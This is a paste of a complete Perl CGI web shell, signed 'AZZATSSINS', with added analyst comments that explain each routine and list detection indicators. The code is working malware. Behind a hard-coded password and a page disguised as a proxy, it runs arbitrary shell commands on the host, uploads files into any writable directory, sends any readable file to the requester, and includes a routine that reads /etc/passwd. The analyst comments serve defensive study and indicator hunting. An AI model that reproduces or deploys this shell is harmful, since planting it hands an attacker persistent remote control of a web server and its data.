CYBERSERKERS

CGI Simple Web5hell

Jan 22nd, 2016
Perl 12.18 KB | None | 0 0
  1. #!/usr/bin/perl -I/usr/local/bandmin
  # Analyst notes: configuration globals for a password-gated CGI web shell.
  # The shebang's -I switch adds /usr/local/bandmin to Perl's module search path.
  # There is no `use strict` / `use warnings`; every variable below is a package global.
  # $WinNT is never assigned anywhere in this listing, so each `$WinNT ? a : b`
  # evaluates to the Unix branch unless something outside the paste sets it.
  2. $NTCmdSep = "&";
  3. $UnixCmdSep = ";";
  # Seconds passed to alarm() before the SIGALRM handler aborts a running command.
  4. $CommandTimeoutDuration = 300;
  # When true, command output is streamed through a pipe as it is produced.
  5. $ShowDynamicOutput = 1;
  # Hard-coded access password: compared with form field `p` and with the SAVEDPWD cookie.
  # As a fixed literal it is a usable content indicator when hunting for copies of this file.
  6. $azzatssins = "az404";
  # Separator used to chain `cd <dir>` with the requested command in one shell string.
  7. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
  # Command whose output is taken as the current working directory.
  8. $CmdPwd = ($WinNT ? "cd" : "pwd");
  9. $PathSep = ($WinNT ? "\\" : "/");
  # Appended to each command; the Unix form sends stderr to stdout so error text is captured too.
  10. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
  # ReadParse: decode the CGI request into the global hash %in.
  # GET data comes from QUERY_STRING; POST data is read from STDIN (CONTENT_LENGTH bytes).
  # multipart/form-data bodies go through a hand-rolled parser; anything else is treated
  # as URL-encoded key=value pairs. No CGI module and no input validation are used.
  # Analyst note: fields sent by GET sit in the query string, which web-server access
  # logs normally record; POST bodies usually are not logged.
  11. sub ReadParse
  12. {
  # With an argument, the caller's glob is aliased to `in`; otherwise the package %in/$in are used.
  13. local (*in) = @_ if @_;
  14. local ($i, $loc, $key, $val);
  15.  
  # Scalar assignment of a match result: a true/false flag, not the captured boundary.
  16. $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
  17.  
  18. if($ENV{'REQUEST_METHOD'} eq "GET")
  19. {
  20. $in = $ENV{'QUERY_STRING'};
  21. }
  22. elsif($ENV{'REQUEST_METHOD'} eq "POST")
  23. {
  # `&` is bitwise AND here, not logical `&&`.
  24. binmode(STDIN) if $MultipartFormData & $WinNT;
  # Reads exactly the client-declared CONTENT_LENGTH bytes; the return value is not checked.
  25. read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
  26. }
  # Same match again, this time to populate $1 with the boundary token.
  27. if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  28. {
  29. $Boundary = '--'.$1;
  # The boundary is interpolated into the split pattern as a regex, without \Q...\E quoting.
  30. @list = split(/$Boundary/, $in);
  # $list[1], the first part after the opening boundary, is assumed to be the uploaded file.
  31. $HeaderBody = $list[1];
  # Split part headers from content at the first blank line using the pre/post-match variables.
  32. $HeaderBody =~ /\r\n\r\n|\n\n/;
  33. $Header = $`;
  34. $Body = $';
  35. $Body =~ s/\r\n$//;
  # Raw file content is kept in %in under 'filedata'; the client-supplied filename goes to 'f'.
  36. $in{'filedata'} = $Body;
  37. $Header =~ /filename=\"(.+)\"/;
  38. $in{'f'} = $1;
  39. $in{'f'} =~ s/\"//g;
  40. $in{'f'} =~ s/\s//g;
  41.  
  42. # parse trailer
  # Remaining parts: the first quoted \w+ token is taken as the field name and the text
  # after it as the value, which is then trimmed and percent-decoded.
  43. for($i=2; $list[$i]; $i++)
  44. {
  45. $list[$i] =~ s/^.+name=$//;
  46. $list[$i] =~ /\"(\w+)\"/;
  47. $key = $1;
  48. $val = $';
  49. $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
  50. $val =~ s/%(..)/pack("c", hex($1))/ge;
  51. $in{$key} = $val;
  52. }
  53. }
  54. else # standard post data (url encoded, not multipart)
  55. {
  56. @in = split(/&/, $in);
  57. foreach $i (0 .. $#in)
  58. {
  # '+' becomes a space, then key and value are percent-decoded separately.
  59. $in[$i] =~ s/\+/ /g;
  60. ($key, $val) = split(/=/, $in[$i], 2);
  61. $key =~ s/%(..)/pack("c", hex($1))/ge;
  62. $val =~ s/%(..)/pack("c", hex($1))/ge;
  # A repeated key has its values joined with a NUL byte.
  63. $in{$key} .= "\0" if (defined($in{$key}));
  64. $in{$key} .= $val;
  65. }
  66. }
  67. }
  68.  
  # foo: read /etc/passwd and return a hash reference keyed by login name; each entry
  # holds that account's uid, gid and home directory. The password, GECOS and shell
  # fields are split out but not stored.
  # Nothing in this listing calls foo(); it looks like leftover helper code.
  69. sub foo
  70. {
  71. my ( $login, $p, $uid, $gid, $gecos, $dir, $s );
  72.  
  73. my %HoH = ();
  74.  
  75. my $file = '/etc/passwd';
  # Two-argument open on a bareword handle; dies if the file cannot be read.
  76. open( PASSWD, "< $file" ) or die "Can't open $file : $!";
  77.  
  78. while( <PASSWD> ) {
  # Lines are not chomped, so the last field ($s) keeps its trailing newline.
  79. ( $login, $p, $uid, $gid, $gecos, $dir, $s ) = split( ':' );
  80.  
  81. $HoH{ $login }{ 'uid' } = $uid;
  82. $HoH{ $login }{ 'gid' } = $gid;
  83. $HoH{ $login }{ 'dir' } = $dir;
  84. }
  85.  
  86. close PASSWD;
  87.  
  88. return \%HoH;
  89. }
  # PrintPageHeader: emit the CGI Content-type header and the HTML <head>/<body> opener.
  # Side effect: sets the global $EncodedCurrentDir to a percent-encoded copy of
  # $CurrentDir (each non-alphanumeric character becomes '%' plus its hex form).
  # Callers pass "p", "c" or "f", but @_ is never read here, so the argument has no effect.
  # Analyst note: the fixed meta description, the <title> and the externally hosted
  # background-image URL in the heredoc are stable strings to match on in file content
  # or HTTP responses; a browser rendering the page also fetches that image from the
  # third-party host.
  90. sub PrintPageHeader
  91. {
  92. $EncodedCurrentDir = $CurrentDir;
  93. $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  94. print "Content-type: text/html\n\n";
  # $HtmlMetaHeader is interpolated into <head>; it is only set by the download link page.
  95. print <<END;
  96. <html>
  97. <head>
  98. <meta content=PERLSHELL-BY-AZZATSSINS-CYBERSERKERS-OF-PSYCHOPATH name=description>
  99. <title>.: AZZATSSINS :.</title>
  100. $HtmlMetaHeader
  101. </head>
  102. <body style='color: #000000;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #000000; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #000000; OVERFLOW: auto;'>
  103. END
  104. }
  105.  
  # PrintLoginScreen: print the global $Message. It is set here to a q$...$ literal that
  # contains only a newline, so the sub emits blank lines and nothing visible.
  106. sub PrintLoginScreen
  107. {
  108. $Message = q$
  109. $;
  # The lone `#'` below is a comment; presumably it re-balances quotes for syntax highlighters.
  110. #'
  111. print <<END;
  112. $Message
  113. END
  114. }
  # PrintLoginFailedMessage: print a fixed HTML message shown after a wrong password.
  # The message text is static, so it can serve as a response-body indicator.
  115. sub PrintLoginFailedMessage
  116. {
  117. print <<END;
  118. <code>
  119. <center><br>WHAT THE HELL ARE YOU DOING...!!!<br>
  120. </center>
  121. </code>
  122. END
  123. }
  124.  
  # PrintLoginForm: print the login form, which POSTs back to $ScriptLocation with the
  # hidden field a=login and a password-type field named `p`.
  # Analyst note: the form is labelled "SIMPLE CGI PROXY" / "INPUT URL" and pre-fills the
  # password field with a URL, so an unauthenticated visitor sees what looks like a proxy
  # page rather than a shell login. The heading text is a fixed string to match on.
  125. sub PrintLoginForm
  126. {
  127. print <<END;
  128. <code>
  129. <br><b><i><font color=red><h1>.: SIMPLE CGI PROXY :.</h1></font><br><font color=lime>INPUT URL....</font></i></b><br>
  130. <form name="f" method="POST" action="$ScriptLocation">
  131. <input type="hidden" name="a" value="login"><center><input type="password" name="p" value="http://azzatssinz.tumblr.com">
  132. <input type="submit" value="GO!!">
  133. </center>
  134. </form>
  135. </code>
  136. END
  137. }
  # PrintPageFooter: print the closing HTML tags for every page this script renders.
  138. sub PrintPageFooter
  139. {
  140. print "</font></body></html>";
  141. }
  142.  
  # GetCookies: split the HTTP_COOKIE request header on "; " and store each
  # name/value pair in the global hash %Cookies. Values are not URL-decoded.
  143. sub GetCookies
  144. {
  145. @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
  146. foreach $cookie(@httpcookies)
  147. {
  # Only the text between the first and second '=' is kept as the value.
  148. ($id, $val) = split(/=/, $cookie);
  149. $Cookies{$id} = $val;
  150. }
  151. }
  152.  
  # PrintLogoutScreen: print a fixed "LogOut Success..." link pointing at an external blog URL.
  153. sub PrintLogoutScreen
  154. {
  155. print "<code><center><a href=http://azzatssinz.tumblr.com>LogOut Success...</a></center><br><br></code>";
  156. }
  157.  
  # PerformLogout: blank the SAVEDPWD cookie, then render the logout notice and login form.
  # The Set-Cookie line is printed before PrintPageHeader emits Content-type, so it is
  # sent as a response header.
  158. sub PerformLogout
  159. {
  160. print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
  161. &PrintPageHeader("p");
  162. &PrintLogoutScreen;
  163. &PrintLoginScreen;
  164. &PrintLoginForm;
  165. &PrintPageFooter;
  166. }
  167.  
  # PerformLogin: compare the submitted password ($LoginPassword, form field `p`) with
  # the hard-coded $azzatssins. On a match, set the session cookie and show the command
  # form; otherwise show the login form again, with a failure message if a password was sent.
  # Analyst note: the cookie SAVEDPWD carries the password itself in clear text, with no
  # Path, HttpOnly or Secure attribute, so the cookie name and value are visible in any
  # proxy log or packet capture of plain-HTTP traffic to this script.
  168. sub PerformLogin
  169. {
  170. if($LoginPassword eq $azzatssins) # password matched
  171. {
  # Printed before the Content-type line, so it is sent as a response header.
  172. print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
  173. &PrintPageHeader("c");
  174. &PrintCommandLineInputForm;
  175. &PrintPageFooter;
  176. }
  177. else # password didn't match
  178. {
  179. &PrintPageHeader("p");
  180. &PrintLoginScreen;
  181. if($LoginPassword ne "") # some password was entered
  182. {
  183. &PrintLoginFailedMessage;
  184. }
  185. &PrintLoginForm;
  186. &PrintPageFooter;
  187. }
  188. }
  189.  
  # PrintCommandLineInputForm: print the command prompt form. It POSTs to $ScriptLocation
  # with a=command, the working directory in hidden field `d`, and the command text in `c`.
  # The working directory is therefore state held by the client and sent back on every request.
  # $CurrentDir and $ServerName are interpolated into the HTML without escaping.
  # Analyst note: the upload link's image is loaded from an external host, so viewing the
  # page produces an outbound request from the operator's browser to that host.
  190. sub PrintCommandLineInputForm
  191. {
  # Cosmetic shell-style prompt; "admin" is a fixed label, not the account the script runs as.
  192. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\ ";
  193. print <<END;
  194. <code>
  195. <center><a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir"><img src=http://azzat.wap.mu/files/1049320/az-bn-idb.png width=100px height=90></a><br><font color=silver>=====================</font><br><br><form name="f" method="POST" action="$ScriptLocation">
  196. <input type="hidden" name="a" value="command">
  197. <input type="hidden" name="d" value="$CurrentDir">
  198. <b><i><font color="red">$Prompt</font>
  199. </i></b><br>
  200. <input type="text" name="c" size="25">
  201. <input type="submit" value="Enter">
  202. </form>
  203. </center>
  204. </code>
  205.  
  206. END
  207. }
  208.  
  # PrintFileDownloadForm: print the download form. It POSTs to $ScriptLocation with
  # a=download, the working directory in hidden field `d`, and the requested path in `f`.
  209. sub PrintFileDownloadForm
  210. {
  # Cosmetic shell-style prompt reused as the form caption.
  211. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\ ";
  212. print <<END;
  213. <code>
  214. <center><font color=lime><b><i><form name="f" method="POST" action="$ScriptLocation">
  215. <input type="hidden" name="d" value="$CurrentDir">
  216. <input type="hidden" name="a" value="download">
  217. $Prompt download<br><br>
  218. Filename: <input type="text" name="f" size="35"><br><br>
  219. Download: <input type="submit" value="Begin">
  220. </form>
  221. </i></b></font></center>
  222. </code>
  223. END
  224. }
  225.  
  # PrintFileUploadForm: print navigation links (home, download, logout) and the
  # multipart upload form. The form POSTs to $ScriptLocation with a=upload, the target
  # directory in hidden field `d`, the file in `f`, and an optional o=overwrite checkbox.
  # Analyst note: a multipart/form-data POST to a CGI script carrying these field names
  # is the request shape that precedes a file being written by UploadFile.
  226. sub PrintFileUploadForm
  227. {
  # Cosmetic shell-style prompt reused as the form caption.
  228. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\ ";
  229. print <<END;
  230. <code>
  231. <center><font color="lime"><b><i>[<a href="$ScriptLocation?">Home</a>] [<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a>] [<a href="$ScriptLocation?a=logout">Logout</a>
  232. ]</i></b></font><br><font color=lime><b><i><form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
  233. $Prompt upload<br><br>
  234. Filename: <input type="file" name="f" size="35"><br><br>
  235. Options: <input type="checkbox" name="o" value="overwrite">
  236. Overwrite if it Exists<br><br>
  237. Upload: <input type="submit" value="Begin">
  238. <input type="hidden" name="d" value="$CurrentDir">
  239. <input type="hidden" name="a" value="upload">
  240. </form></i></b></font>
  241. </center>
  242. </code>
  243. END
  244. }
  245.  
  # CommandTimeout: SIGALRM handler installed by ExecuteCommand. On non-Windows hosts it
  # cancels the alarm, prints a timeout notice, re-renders the command form and exits the
  # CGI process. On Windows ($WinNT true) it does nothing.
  # NOTE(review): the page says "Killed it!", but no explicit kill of the child process
  # is visible here; only this script exits.
  246. sub CommandTimeout
  247. {
  248. if(!$WinNT)
  249. {
  250. alarm(0);
  251. print <<END;
  252. </xmp>
  253. <code>
  254. Command exceeded maximum time of $CommandTimeoutDuration second(s).
  255. <br>Killed it!
  256. <code>
  257. END
  258. &PrintCommandLineInputForm;
  259. &PrintPageFooter;
  260. exit;
  261. }
  262. }
  # ExecuteCommand: core of the shell. $RunCommand (request field `c`) and $CurrentDir
  # (request field `d`) are concatenated into a shell command string and run as the
  # account the CGI script executes under. Neither value is validated or quoted beyond
  # the double quotes placed around $CurrentDir.
  # A leading `cd <dir>` is handled separately: the new directory is resolved by the
  # shell and stored in $CurrentDir; no other output is shown.
  # Analyst note: every command request makes the CGI interpreter spawn a shell child,
  # so process-creation telemetry showing the web server's Perl process parenting a shell
  # is the host-side signal; on the wire it is a POST with a=command plus `c` and `d`.
  263. sub ExecuteCommand
  264. {
  265. if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
  266. {
  267.  
  268. $OldDir = $CurrentDir;
  # Shell string: enter the old directory, enter the requested one, print the resulting path.
  269. $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  # Backticks run the string; chop removes the last character (the trailing newline).
  270. chop($CurrentDir = `$Command`);
  271. &PrintPageHeader("c");
  272. &PrintCommandLineInputForm;
  273. print "<div style='float: center; text-align: left;'>";
  274. $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\ ";
  # The submitted command is echoed into the page without HTML escaping.
  275. print "<code><center><font color=violet><b><i>$Prompt <br> $RunCommand</i></b></font></center></code>";
  276. }
  277. else # some other command, display the output
  278. {
  279. &PrintPageHeader("c");
  280. &PrintCommandLineInputForm;
  281. print "<div style='float: center; text-align: left;'>";
  282. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\ ";
  283. print "<code><center><font color=violet><b><i>$Prompt <br> $RunCommand<br></i></b></font></center></code><xmp style='color: #00FF00;'>";
  # Shell string: enter the working directory, run the command, apply the stderr redirect.
  284. $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
  285. if(!$WinNT)
  286. {
  # Arm the timeout; CommandTimeout runs if the command outlives $CommandTimeoutDuration seconds.
  287. $SIG{'ALRM'} = \&CommandTimeout;
  288. alarm($CommandTimeoutDuration);
  289. }
  290. if($ShowDynamicOutput) # show output as it is generated
  291. {
  # Unbuffer STDOUT so each line reaches the browser as soon as it is read.
  292. $|=1;
  # Two-argument open with a trailing " |" runs the string through the shell and reads
  # its output; the return value of open is not checked.
  293. $Command .= " |";
  294. open(CommandOutput, $Command);
  295. while(<CommandOutput>)
  296. {
  297. $_ =~ s/(\n|\r\n)$//;
  298. print "$_\n";
  299. }
  300. $|=0;
  301. }
  302. else # show output after command completes
  303. {
  # Inside a double-quoted string the backticks are literal characters, so this branch
  # prints the command text itself. With $ShowDynamicOutput = 1 it is not reached.
  304. print "<code><center><b><i><font color=orange> `$Command` </font></i></b></center></code>";
  305. }
  306. if(!$WinNT)
  307. {
  # Command finished in time: disarm the timeout.
  308. alarm(0);
  309. }
  310. print "</xmp>";
  311. }
  312. print "</div>";
  313. &PrintPageFooter;
  314. }
  315.  
  # PrintDownloadLinkPage: given a file path, render an interstitial page that starts the
  # download. If the path exists, it is percent-encoded and placed in a link of the form
  # <script>?a=download&f=<path>&o=go, which is also set as a 1-second meta refresh.
  # If the path does not exist, an error and the download form are shown instead.
  # Analyst note: the follow-up request is a GET, so the requested file path appears
  # percent-encoded in the query string of the access-log entry.
  316. sub PrintDownloadLinkPage
  317. {
  318. local($FileUrl) = @_;
  319. if(-e $FileUrl) # if the file exists
  320. {
  321. # encode the file link so we can send it to the browser
  322. $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  323. $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
  # PrintPageHeader interpolates this global into <head>, which triggers the redirect.
  324. $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
  325. &PrintPageHeader("c");
  # The message shows $TransferFile (the name as submitted), not the resolved path.
  326. print <<END;
  327. <code>
  328. Sending File $TransferFile...<br>
  329. If the download does not start automatically,
  330. <a href="$DownloadLink">Click Here</a>.
  331. </code>
  332. END
  333. &PrintCommandLineInputForm;
  334. &PrintPageFooter;
  335. }
  336. else # file doesn't exist
  337. {
  338. &PrintPageHeader("f");
  339. print "<code>Failed to download $FileUrl: $!</code>";
  340. &PrintFileDownloadForm;
  341. &PrintPageFooter;
  342. }
  343. }
  344.  
  # SendFileToBrowser: stream the file at the given path to the client as an attachment.
  # On success it prints Content-Type, Content-Length (from stat) and Content-Disposition
  # headers, then the file contents. On failure it renders an error page with the
  # download form.
  # Any file readable by the account the CGI script runs as can be returned this way.
  # Analyst note: responses from this path have Content-Type application/x-unknown and an
  # attachment disposition, which stands out from a script that otherwise returns text/html.
  345. sub SendFileToBrowser
  346. {
  347. local($SendFile) = @_;
  # Two-argument open on a bareword handle: Perl also parses the path string for mode characters.
  348. if(open(SENDFILE, $SendFile)) # file opened for reading
  349. {
  350. if($WinNT)
  351. {
  352. binmode(SENDFILE);
  353. binmode(STDOUT);
  354. }
  # Element 7 of stat() is the size in bytes.
  355. $FileSize = (stat($SendFile))[7];
  # The match captures the final path component into $1; that $1 is what the header below uses.
  356. ($Filename = $SendFile) =~ m!([^/^\\]*)$!;
  357. print "Content-Type: application/x-unknown\n";
  358. print "Content-Length: $FileSize\n";
  359. print "Content-Disposition: attachment; filename=$1\n\n";
  360. print while(<SENDFILE>);
  361. close(SENDFILE);
  362. }
  363. else # failed to open file
  364. {
  365. &PrintPageHeader("f");
  366. print "<code>Failed to download $SendFile: $!</code>";
  367. &PrintFileDownloadForm;
  368. &PrintPageFooter;
  369. }
  370. }
  371.  
  372.  
  # BeginDownload: resolve $TransferFile to a full path (absolute as given, otherwise
  # relative to $CurrentDir), then either send the file (o=go) or show the link page.
  # The body duplicates the second half of DownloadFile, and nothing in this listing
  # calls BeginDownload.
  373. sub BeginDownload
  374. {
  375. # get fully qualified path of the file to be downloaded
  # `&` and `|` are bitwise operators applied to match results; presumably logical
  # and/or was intended.
  376. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  377. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  378. {
  379. $TargetFile = $TransferFile;
  380. }
  381. else # path is relative
  382. {
  # Copy $CurrentDir into $TargetFile and drop one trailing path separator if present.
  383. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  384. $TargetFile .= $PathSep.$TransferFile;
  385. }
  386.  
  387. if($Options eq "go") # we have to send the file
  388. {
  389. &SendFileToBrowser($TargetFile);
  390. }
  391. else # we have to send only the link page
  392. {
  393. &PrintDownloadLinkPage($TargetFile);
  394. }
  395. }
  396.  
  # UploadFile: write the uploaded file content ($in{'filedata'}, filled in by ReadParse
  # for multipart requests) into $CurrentDir under the base name of the submitted filename.
  # With no filename it just shows the upload form. An existing file is left alone
  # unless the request carried o=overwrite.
  # The destination directory comes from request field `d`, so the write can land in any
  # directory writable by the account the CGI script runs as.
  # Analyst note: file-integrity monitoring on web roots and on directories writable by
  # the web-server account is the host-side control that surfaces these writes; the
  # response page also echoes the full destination path.
  397. sub UploadFile
  398. {
  399. # if no file is specified, print the upload form again
  400. if($TransferFile eq "")
  401. {
  402. &PrintPageHeader("f");
  403. &PrintFileUploadForm;
  404. &PrintPageFooter;
  405. return;
  406. }
  407. &PrintPageHeader("c");
  408.  
  409. # start the uploading process
  410. print "<code>Uploading $TransferFile to $CurrentDir...<br>";
  411.  
  412. # get the fullly qualified pathname of the file to be created
  # Copy $CurrentDir into $TargetName and drop one trailing path separator if present.
  413. chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
  # Keep only the final path component of the client-supplied filename (captured in $1).
  414. $TransferFile =~ m!([^/^\\]*)$!;
  415. $TargetName .= $PathSep.$1;
  416.  
  417. $TargetFileSize = length($in{'filedata'});
  418. # if the file exists and we are not supposed to overwrite it
  419. if(-e $TargetName && $Options ne "overwrite")
  420. {
  421. print "Failed: Destination file already exists.<br>";
  422. }
  423. else # file is not present
  424. {
  # Two-argument open with the mode character prepended to the path string.
  425. if(open(UPLOADFILE, ">$TargetName"))
  426. {
  427. binmode(UPLOADFILE) if $WinNT;
  # Neither the print nor the close is checked, so a short write is still reported as success.
  428. print UPLOADFILE $in{'filedata'};
  429. close(UPLOADFILE);
  430. print "Transfered $TargetFileSize Bytes.<br>";
  431. print "File Path: $TargetName<br>";
  432. }
  433. else
  434. {
  435. print "Failed: $!<br>";
  436. }
  437. }
  438. print "</code>";
  439. &PrintCommandLineInputForm;
  440. &PrintPageFooter;
  441. }
  442.  
  # DownloadFile: handler for a=download. With no filename it shows the download form.
  # Otherwise it resolves $TransferFile (request field `f`) to a full path, absolute as
  # given or relative to $CurrentDir, and either streams the file (o=go) or shows the
  # interstitial link page.
  # The path is not restricted to any directory; access is limited only by the file
  # permissions of the account the CGI script runs as.
  443. sub DownloadFile
  444. {
  445. # if no file is specified, print the download form again
  446. if($TransferFile eq "")
  447. {
  448. &PrintPageHeader("f");
  449. &PrintFileDownloadForm;
  450. &PrintPageFooter;
  451. return;
  452. }
  453.  
  454. # get fully qualified path of the file to be downloaded
  # `&` and `|` are bitwise operators applied to match results; presumably logical
  # and/or was intended.
  455. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  456. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  457. {
  458. $TargetFile = $TransferFile;
  459. }
  460. else # path is relative
  461. {
  # Copy $CurrentDir into $TargetFile and drop one trailing path separator if present.
  462. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  463. $TargetFile .= $PathSep.$TransferFile;
  464. }
  465.  
  466. if($Options eq "go") # we have to send the file
  467. {
  468. &SendFileToBrowser($TargetFile);
  469. }
  470. else # we have to send only the link page
  471. {
  472. &PrintDownloadLinkPage($TargetFile);
  473. }
  474. }
  475.  
  # Main program: parse the request, copy request fields into globals, decide whether
  # the caller is authenticated, and dispatch on the `a` (action) field.
  # Analyst note: the request vocabulary is small and fixed: a (action: login, command,
  # upload, download, logout), p (password), c (command), d (directory), f (file),
  # o (option), plus the cookie SAVEDPWD. That combination against a single CGI path is
  # a practical pattern for log and proxy searches.
  476. &ReadParse;
  477. &GetCookies;
  478.  
  479. $ScriptLocation = $ENV{'SCRIPT_NAME'};
  480. $ServerName = $ENV{'SERVER_NAME'};
  481. $LoginPassword = $in{'p'};
  482. $RunCommand = $in{'c'};
  483. $TransferFile = $in{'f'};
  484. $Options = $in{'o'};
  485.  
  486. $Action = $in{'a'};
  487. $Action = "login" if($Action eq ""); # no action specified, use default
  488.  
  489. # get the directory in which the commands will be executed
  490. $CurrentDir = $in{'d'};
  # No directory supplied: run $CmdPwd through the shell and use its output, minus the last character.
  491. chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
  492.  
  # Authentication is a plain string comparison between the SAVEDPWD cookie and the
  # hard-coded password; there is no session token, expiry or rate limiting.
  493. $LoggedIn = $Cookies{'SAVEDPWD'} eq $azzatssins;
  494.  
  # Every action other than login is reachable only when $LoggedIn is true.
  # An unrecognised action with a valid cookie matches no branch and prints nothing.
  495. if($Action eq "login" || !$LoggedIn) # user needs/has to login
  496. {
  497. &PerformLogin;
  498. }
  499. elsif($Action eq "command") # user wants to run a command
  500. {
  501. &ExecuteCommand;
  502. }
  503. elsif($Action eq "upload") # user wants to upload a file
  504. {
  505. &UploadFile;
  506. }
  507. elsif($Action eq "download") # user wants to download a file
  508. {
  509. &DownloadFile;
  510. }
  511. elsif($Action eq "logout") # user wants to logout
  512. {
  513. &PerformLogout;
  514. }